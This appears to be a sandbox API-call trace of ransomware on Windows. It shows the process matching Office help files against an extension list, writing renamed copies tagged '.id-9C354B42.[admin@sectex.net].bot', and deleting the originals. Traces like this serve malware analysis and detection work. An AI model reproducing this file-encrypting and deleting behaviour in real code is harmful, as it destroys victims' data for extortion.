	[0152.689] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.DEV.HXS") returned 61
	[0152.689] lstrlenW (lpString=".zip") returned 4
	[0152.689] lstrcmpiW (lpString1=".zip", lpString2=".HXS") returned 1
	[0152.689] lstrlenW (lpString=".rar") returned 4
	[0152.689] lstrcmpiW (lpString1=".rar", lpString2=".HXS") returned 1
	[0152.689] lstrlenW (lpString=".bz2") returned 4
	[0152.689] lstrcmpiW (lpString1=".bz2", lpString2=".HXS") returned -1
	[0152.689] lstrlenW (lpString=".7z") returned 3
	[0152.689] lstrcmpiW (lpString1=".7z", lpString2="HXS") returned -1
	[0152.689] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.DEV.HXS") returned 61
	[0152.689] lstrlenW (lpString=".dbf") returned 4
	[0152.689] lstrcmpiW (lpString1=".dbf", lpString2=".HXS") returned -1
	[0152.689] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.DEV.HXS") returned 61
	[0152.689] lstrlenW (lpString=".1cd") returned 4
	[0152.689] lstrcmpiW (lpString1=".1cd", lpString2=".HXS") returned -1
	[0152.689] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.DEV.HXS") returned 61
	[0152.690] lstrlenW (lpString=".jpg") returned 4
	[0152.690] lstrcmpiW (lpString1=".jpg", lpString2=".HXS") returned 1
	[0152.690] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.DEV.HXS") returned 61
	[0152.690] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.DEV.HXS") returned 61
	[0152.690] lstrlenW (lpString=".doc") returned 4
	[0152.690] lstrcmpiW (lpString1=".doc", lpString2=".HXS") returned -1
	[0152.690] lstrlenW (lpString=".docx") returned 5
	[0152.690] lstrcmpiW (lpString1=".docx", lpString2="V.HXS") returned -1
	[0152.690] lstrlenW (lpString=".pdf") returned 4
	[0152.690] lstrcmpiW (lpString1=".pdf", lpString2=".HXS") returned 1
	[0152.690] lstrlenW (lpString=".xls") returned 4
	[0152.690] lstrcmpiW (lpString1=".xls", lpString2=".HXS") returned 1
	[0152.690] lstrlenW (lpString=".xlsx") returned 5
	[0152.690] lstrcmpiW (lpString1=".xlsx", lpString2="V.HXS") returned -1
	[0152.690] lstrlenW (lpString=".ppt") returned 4
	[0152.690] lstrcmpiW (lpString1=".ppt", lpString2=".HXS") returned 1
	[0152.690] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.DEV.HXS") returned 61
	[0152.690] lstrlenW (lpString=".zip") returned 4
	[0152.690] lstrcmpiW (lpString1=".zip", lpString2=".HXS") returned 1
	[0152.690] lstrlenW (lpString=".rar") returned 4
	[0152.690] lstrcmpiW (lpString1=".rar", lpString2=".HXS") returned 1
	[0152.690] lstrlenW (lpString=".bz2") returned 4
	[0152.690] lstrcmpiW (lpString1=".bz2", lpString2=".HXS") returned -1
	[0152.690] lstrlenW (lpString=".7z") returned 3
	[0152.690] lstrcmpiW (lpString1=".7z", lpString2="HXS") returned -1
	[0152.690] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.DEV.HXS") returned 61
	[0152.690] lstrlenW (lpString=".dbf") returned 4
	[0152.690] lstrcmpiW (lpString1=".dbf", lpString2=".HXS") returned -1
	[0152.690] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.DEV.HXS") returned 61
	[0152.690] lstrlenW (lpString=".1cd") returned 4
	[0152.690] lstrcmpiW (lpString1=".1cd", lpString2=".HXS") returned -1
	[0152.691] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.DEV.HXS") returned 61
	[0152.691] lstrlenW (lpString=".jpg") returned 4
	[0152.691] lstrcmpiW (lpString1=".jpg", lpString2=".HXS") returned 1
	[0152.691] lstrcmpiW (lpString1=".HXC", lpString2=".bot") returned 1
	[0152.691] lstrlenW (lpString="VISIO.DEV_COL.HXC") returned 17
	[0152.691] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.DEV_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio.dev_col.hxc"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f8
	[0152.691] GetFileSizeEx (in: hFile=0x3f8, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=641) returned 1
	[0152.691] CloseHandle (hObject=0x3f8) returned 1
	[0152.691] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.DEV_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio.dev_col.hxc")) returned 0x20
	[0152.691] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.DEV_COL.HXC.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio.dev_col.hxc.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0152.692] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.DEV_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio.dev_col.hxc"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f8
	[0152.692] SetFilePointerEx (in: hFile=0x3f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0152.692] SetFilePointerEx (in: hFile=0x3f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0152.692] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.DEV_COL.HXC.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio.dev_col.hxc.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c8
	[0152.695] GetLastError () returned 0x0
	[0152.695] ReadFile (in: hFile=0x3f8, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x281, lpOverlapped=0x0) returned 1
	[0152.697] WriteFile (in: hFile=0x3c8, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0x290, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0x290, lpOverlapped=0x0) returned 1
	[0152.698] ReadFile (in: hFile=0x3f8, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0152.698] WriteFile (in: hFile=0x3c8, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xf6, lpOverlapped=0x0) returned 1
	[0152.698] SetEndOfFile (hFile=0x3c8) returned 1
	[0152.698] CloseHandle (hObject=0x3c8) returned 1
	[0152.698] SetFilePointerEx (in: hFile=0x3f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0152.698] SetEndOfFile (hFile=0x3f8) returned 1
	[0152.700] CloseHandle (hObject=0x3f8) returned 1
	[0152.700] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.DEV_COL.HXC.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0152.701] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.DEV_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio.dev_col.hxc")) returned 1
	[0152.701] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.DEV_COL.HXC") returned 65
	[0152.701] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.DEV_COL.HXC") returned 65
	[0152.701] lstrlenW (lpString=".doc") returned 4
	[0152.701] lstrcmpiW (lpString1=".doc", lpString2=".HXC") returned -1
	[0152.701] lstrlenW (lpString=".docx") returned 5
	[0152.701] lstrcmpiW (lpString1=".docx", lpString2="L.HXC") returned -1
	[0152.701] lstrlenW (lpString=".pdf") returned 4
	[0152.701] lstrcmpiW (lpString1=".pdf", lpString2=".HXC") returned 1
	[0152.701] lstrlenW (lpString=".xls") returned 4
	[0152.701] lstrcmpiW (lpString1=".xls", lpString2=".HXC") returned 1
	[0152.701] lstrlenW (lpString=".xlsx") returned 5
	[0152.702] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXC") returned -1
	[0152.702] lstrlenW (lpString=".ppt") returned 4
	[0152.702] lstrcmpiW (lpString1=".ppt", lpString2=".HXC") returned 1
	[0152.702] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.DEV_COL.HXC") returned 65
	[0152.702] lstrlenW (lpString=".zip") returned 4
	[0152.702] lstrcmpiW (lpString1=".zip", lpString2=".HXC") returned 1
	[0152.702] lstrlenW (lpString=".rar") returned 4
	[0152.702] lstrcmpiW (lpString1=".rar", lpString2=".HXC") returned 1
	[0152.702] lstrlenW (lpString=".bz2") returned 4
	[0152.702] lstrcmpiW (lpString1=".bz2", lpString2=".HXC") returned -1
	[0152.702] lstrlenW (lpString=".7z") returned 3
	[0152.702] lstrcmpiW (lpString1=".7z", lpString2="HXC") returned -1
	[0152.702] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.DEV_COL.HXC") returned 65
	[0152.702] lstrlenW (lpString=".dbf") returned 4
	[0152.702] lstrcmpiW (lpString1=".dbf", lpString2=".HXC") returned -1
	[0152.702] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.DEV_COL.HXC") returned 65
	[0152.702] lstrlenW (lpString=".1cd") returned 4
	[0152.702] lstrcmpiW (lpString1=".1cd", lpString2=".HXC") returned -1
	[0152.702] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.DEV_COL.HXC") returned 65
	[0152.702] lstrlenW (lpString=".jpg") returned 4
	[0152.702] lstrcmpiW (lpString1=".jpg", lpString2=".HXC") returned 1
	[0152.702] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.DEV_COL.HXC") returned 65
	[0152.702] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.DEV_COL.HXC") returned 65
	[0152.702] lstrlenW (lpString=".doc") returned 4
	[0152.702] lstrcmpiW (lpString1=".doc", lpString2=".HXC") returned -1
	[0152.702] lstrlenW (lpString=".docx") returned 5
	[0152.702] lstrcmpiW (lpString1=".docx", lpString2="L.HXC") returned -1
	[0152.702] lstrlenW (lpString=".pdf") returned 4
	[0152.702] lstrcmpiW (lpString1=".pdf", lpString2=".HXC") returned 1
	[0152.702] lstrlenW (lpString=".xls") returned 4
	[0152.703] lstrcmpiW (lpString1=".xls", lpString2=".HXC") returned 1
	[0152.703] lstrlenW (lpString=".xlsx") returned 5
	[0152.703] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXC") returned -1
	[0152.703] lstrlenW (lpString=".ppt") returned 4
	[0152.703] lstrcmpiW (lpString1=".ppt", lpString2=".HXC") returned 1
	[0152.703] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.DEV_COL.HXC") returned 65
	[0152.703] lstrlenW (lpString=".zip") returned 4
	[0152.703] lstrcmpiW (lpString1=".zip", lpString2=".HXC") returned 1
	[0152.703] lstrlenW (lpString=".rar") returned 4
	[0152.703] lstrcmpiW (lpString1=".rar", lpString2=".HXC") returned 1
	[0152.703] lstrlenW (lpString=".bz2") returned 4
	[0152.703] lstrcmpiW (lpString1=".bz2", lpString2=".HXC") returned -1
	[0152.703] lstrlenW (lpString=".7z") returned 3
	[0152.703] lstrcmpiW (lpString1=".7z", lpString2="HXC") returned -1
	[0152.703] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.DEV_COL.HXC") returned 65
	[0152.703] lstrlenW (lpString=".dbf") returned 4
	[0152.703] lstrcmpiW (lpString1=".dbf", lpString2=".HXC") returned -1
	[0152.703] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.DEV_COL.HXC") returned 65
	[0152.703] lstrlenW (lpString=".1cd") returned 4
	[0152.703] lstrcmpiW (lpString1=".1cd", lpString2=".HXC") returned -1
	[0152.703] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.DEV_COL.HXC") returned 65
	[0152.703] lstrlenW (lpString=".jpg") returned 4
	[0152.703] lstrcmpiW (lpString1=".jpg", lpString2=".HXC") returned 1
	[0152.703] lstrcmpiW (lpString1=".HXT", lpString2=".bot") returned 1
	[0152.703] lstrlenW (lpString="VISIO.DEV_COL.HXT") returned 17
	[0152.703] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.DEV_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio.dev_col.hxt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f8
	[0152.704] GetFileSizeEx (in: hFile=0x3f8, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=209) returned 1
	[0152.704] CloseHandle (hObject=0x3f8) returned 1
	[0152.704] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.DEV_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio.dev_col.hxt")) returned 0x20
	[0152.704] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.DEV_COL.HXT.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio.dev_col.hxt.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0152.704] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.DEV_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio.dev_col.hxt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f8
	[0152.704] SetFilePointerEx (in: hFile=0x3f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0152.705] SetFilePointerEx (in: hFile=0x3f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0152.705] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.DEV_COL.HXT.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio.dev_col.hxt.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c8
	[0152.705] GetLastError () returned 0x0
	[0152.705] ReadFile (in: hFile=0x3f8, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0xd1, lpOverlapped=0x0) returned 1
	[0152.706] WriteFile (in: hFile=0x3c8, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xe0, lpOverlapped=0x0) returned 1
	[0152.707] ReadFile (in: hFile=0x3f8, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0152.707] WriteFile (in: hFile=0x3c8, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xf6, lpOverlapped=0x0) returned 1
	[0152.707] SetEndOfFile (hFile=0x3c8) returned 1
	[0152.707] CloseHandle (hObject=0x3c8) returned 1
	[0152.707] SetFilePointerEx (in: hFile=0x3f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0152.707] SetEndOfFile (hFile=0x3f8) returned 1
	[0152.710] CloseHandle (hObject=0x3f8) returned 1
	[0152.710] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.DEV_COL.HXT.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0152.710] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.DEV_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio.dev_col.hxt")) returned 1
	[0152.711] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.DEV_COL.HXT") returned 65
	[0152.711] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.DEV_COL.HXT") returned 65
	[0152.711] lstrlenW (lpString=".doc") returned 4
	[0152.711] lstrcmpiW (lpString1=".doc", lpString2=".HXT") returned -1
	[0152.711] lstrlenW (lpString=".docx") returned 5
	[0152.711] lstrcmpiW (lpString1=".docx", lpString2="L.HXT") returned -1
	[0152.711] lstrlenW (lpString=".pdf") returned 4
	[0152.711] lstrcmpiW (lpString1=".pdf", lpString2=".HXT") returned 1
	[0152.711] lstrlenW (lpString=".xls") returned 4
	[0152.711] lstrcmpiW (lpString1=".xls", lpString2=".HXT") returned 1
	[0152.711] lstrlenW (lpString=".xlsx") returned 5
	[0152.712] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXT") returned -1
	[0152.712] lstrlenW (lpString=".ppt") returned 4
	[0152.712] lstrcmpiW (lpString1=".ppt", lpString2=".HXT") returned 1
	[0152.712] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.DEV_COL.HXT") returned 65
	[0152.712] lstrlenW (lpString=".zip") returned 4
	[0152.712] lstrcmpiW (lpString1=".zip", lpString2=".HXT") returned 1
	[0152.712] lstrlenW (lpString=".rar") returned 4
	[0152.712] lstrcmpiW (lpString1=".rar", lpString2=".HXT") returned 1
	[0152.712] lstrlenW (lpString=".bz2") returned 4
	[0152.712] lstrcmpiW (lpString1=".bz2", lpString2=".HXT") returned -1
	[0152.712] lstrlenW (lpString=".7z") returned 3
	[0152.712] lstrcmpiW (lpString1=".7z", lpString2="HXT") returned -1
	[0152.712] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.DEV_COL.HXT") returned 65
	[0152.712] lstrlenW (lpString=".dbf") returned 4
	[0152.712] lstrcmpiW (lpString1=".dbf", lpString2=".HXT") returned -1
	[0152.712] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.DEV_COL.HXT") returned 65
	[0152.712] lstrlenW (lpString=".1cd") returned 4
	[0152.712] lstrcmpiW (lpString1=".1cd", lpString2=".HXT") returned -1
	[0152.712] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.DEV_COL.HXT") returned 65
	[0152.712] lstrlenW (lpString=".jpg") returned 4
	[0152.712] lstrcmpiW (lpString1=".jpg", lpString2=".HXT") returned 1
	[0152.712] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.DEV_COL.HXT") returned 65
	[0152.712] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.DEV_COL.HXT") returned 65
	[0152.712] lstrlenW (lpString=".doc") returned 4
	[0152.712] lstrcmpiW (lpString1=".doc", lpString2=".HXT") returned -1
	[0152.712] lstrlenW (lpString=".docx") returned 5
	[0152.712] lstrcmpiW (lpString1=".docx", lpString2="L.HXT") returned -1
	[0152.712] lstrlenW (lpString=".pdf") returned 4
	[0152.712] lstrcmpiW (lpString1=".pdf", lpString2=".HXT") returned 1
	[0152.712] lstrlenW (lpString=".xls") returned 4
	[0152.712] lstrcmpiW (lpString1=".xls", lpString2=".HXT") returned 1
	[0152.713] lstrlenW (lpString=".xlsx") returned 5
	[0152.713] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXT") returned -1
	[0152.713] lstrlenW (lpString=".ppt") returned 4
	[0152.713] lstrcmpiW (lpString1=".ppt", lpString2=".HXT") returned 1
	[0152.713] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.DEV_COL.HXT") returned 65
	[0152.713] lstrlenW (lpString=".zip") returned 4
	[0152.713] lstrcmpiW (lpString1=".zip", lpString2=".HXT") returned 1
	[0152.713] lstrlenW (lpString=".rar") returned 4
	[0152.713] lstrcmpiW (lpString1=".rar", lpString2=".HXT") returned 1
	[0152.713] lstrlenW (lpString=".bz2") returned 4
	[0152.713] lstrcmpiW (lpString1=".bz2", lpString2=".HXT") returned -1
	[0152.713] lstrlenW (lpString=".7z") returned 3
	[0152.713] lstrcmpiW (lpString1=".7z", lpString2="HXT") returned -1
	[0152.713] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.DEV_COL.HXT") returned 65
	[0152.713] lstrlenW (lpString=".dbf") returned 4
	[0152.713] lstrcmpiW (lpString1=".dbf", lpString2=".HXT") returned -1
	[0152.713] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.DEV_COL.HXT") returned 65
	[0152.713] lstrlenW (lpString=".1cd") returned 4
	[0152.713] lstrcmpiW (lpString1=".1cd", lpString2=".HXT") returned -1
	[0152.713] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.DEV_COL.HXT") returned 65
	[0152.713] lstrlenW (lpString=".jpg") returned 4
	[0152.713] lstrcmpiW (lpString1=".jpg", lpString2=".HXT") returned 1
	[0152.713] lstrcmpiW (lpString1=".HXK", lpString2=".bot") returned 1
	[0152.713] lstrlenW (lpString="VISIO.DEV_F_COL.HXK") returned 19
	[0152.713] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.DEV_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio.dev_f_col.hxk"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f8
	[0152.714] GetFileSizeEx (in: hFile=0x3f8, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=114) returned 1
	[0152.714] CloseHandle (hObject=0x3f8) returned 1
	[0152.714] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.DEV_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio.dev_f_col.hxk")) returned 0x20
	[0152.714] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.DEV_F_COL.HXK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio.dev_f_col.hxk.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0152.714] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.DEV_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio.dev_f_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f8
	[0152.714] SetFilePointerEx (in: hFile=0x3f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0152.714] SetFilePointerEx (in: hFile=0x3f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0152.715] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.DEV_F_COL.HXK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio.dev_f_col.hxk.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c8
	[0152.715] GetLastError () returned 0x0
	[0152.715] ReadFile (in: hFile=0x3f8, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x72, lpOverlapped=0x0) returned 1
	[0152.716] WriteFile (in: hFile=0x3c8, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0x80, lpOverlapped=0x0) returned 1
	[0152.717] ReadFile (in: hFile=0x3f8, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0152.717] WriteFile (in: hFile=0x3c8, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xfa, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xfa, lpOverlapped=0x0) returned 1
	[0152.717] SetEndOfFile (hFile=0x3c8) returned 1
	[0152.718] CloseHandle (hObject=0x3c8) returned 1
	[0152.718] SetFilePointerEx (in: hFile=0x3f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0152.718] SetEndOfFile (hFile=0x3f8) returned 1
	[0152.720] CloseHandle (hObject=0x3f8) returned 1
	[0152.720] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.DEV_F_COL.HXK.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0152.720] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.DEV_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio.dev_f_col.hxk")) returned 1
	[0152.721] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.DEV_F_COL.HXK") returned 67
	[0152.721] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.DEV_F_COL.HXK") returned 67
	[0152.721] lstrlenW (lpString=".doc") returned 4
	[0152.721] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1
	[0152.721] lstrlenW (lpString=".docx") returned 5
	[0152.721] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1
	[0152.721] lstrlenW (lpString=".pdf") returned 4
	[0152.721] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1
	[0152.721] lstrlenW (lpString=".xls") returned 4
	[0152.721] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1
	[0152.721] lstrlenW (lpString=".xlsx") returned 5
	[0152.721] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1
	[0152.721] lstrlenW (lpString=".ppt") returned 4
	[0152.721] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1
	[0152.721] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.DEV_F_COL.HXK") returned 67
	[0152.721] lstrlenW (lpString=".zip") returned 4
	[0152.721] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1
	[0152.721] lstrlenW (lpString=".rar") returned 4
